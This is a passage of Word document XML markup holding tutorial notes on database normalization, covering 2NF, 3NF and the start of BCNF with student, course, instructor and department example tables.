        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52704620"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555-666-7777</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="665373FB" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In 2NF, Student-Course stores only the relationship between students and courses, and Course-Instructor stores instructor details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A953F73"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3. Third Normal Form (3NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFDB65"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Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table is in 3NF if it is in 2NF and all the attributes are functionally dependent on the primary key, with no transitive dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07808983"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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69281591" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="356"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Remove transitive dependencies, where a non-key attribute depends on another non-key attribute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D0579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0BDBFC7" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-3NF Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">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3"/>
        <w:gridCol w:w="685"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="041EC829" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A7339C4"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lastRenderedPageBreak/>
              <w:t>StudentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="717BF36F"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B36E45B"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43E35ACA"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Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="44F1E318" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BF1790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69BCDAD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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D24F12F"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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D454195"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Mathematics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="3F78E437" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EA1F420"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761F3262"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25DCD3B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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23B3B023"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r>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="377866D8" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD7DFFC"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43B87D65"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17AF6409"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Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E9D66AA"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Literature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="210E3334" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Here, Department depends on Instructor, not directly on StudentID or Course.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CF175A" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3NF Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF99C7" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Student-Course Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>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13"/>
        <w:gridCol w:w="700"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="2E0D4ADF" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="007B6F71"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StudentID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6EF72D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="271F1336" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EFE23F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06B69FDA"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="4052CCD3" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E30CE1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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61602405"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r>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="0CF0343C" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4388A1E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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BB8004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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7610A65A" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Course-Instructor Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>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00"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="4F7CDAA1" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77CAD29D"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AFEBE0E"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59CE0403"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Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="7D0E2291" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03DC2FC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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31219E3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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71C065C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Mathematics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="2C5DD90F" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2250FE6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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="183C7449"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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6245D734"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r>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="2E3E6E16" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="275CCEE5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E79F4BE"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Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17AEF6CA"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Literature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C121F81" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>In 3NF, Course-Instructor holds all information related to courses and instructors without transitive dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F65B7"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4. Boyce-Codd Normal Form (BCNF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FDECC1"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Requirement</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>: A table is in BCNF if it is in 3NF and every determinant is a candidate key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667088B2"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Characteristics</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0638F3AD" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="358"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BCNF is a stronger version of 3NF, addressing certain types of anomalies not handled by 3NF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E8F39C"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0D6979D" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Non-BCNF Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">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00"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1161"/>
      </w:tblGrid>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="59113743" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73834A1C"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EBEF98E"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Instructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7866EB"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Department</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="1C4B913C" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0481E2C8"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05E5B32E"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Smith</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="581798BE"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Mathematics</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="54671A7D" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A0F66F8"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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BEDE619"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Johnson</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50A13B2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r>
      <w:tr w:rsidR="00154D21" w:rsidRPr="00DA2F32" w14:paraId="1764DE4E" w14:textId="77777777" w:rsidTr="00154D21">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="127006A7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EBBF4F4"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Brown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB12F00"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Literature</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13B11EDF" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>If Department can determine Instructor but Instructor cannot determine Department, it may not satisfy BCNF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF9FDE6" w14:textId="77777777" w:rsidR="00154D21" w:rsidRPr="00DA2F32" w:rsidRDefault="00154D21" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>BCNF Tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
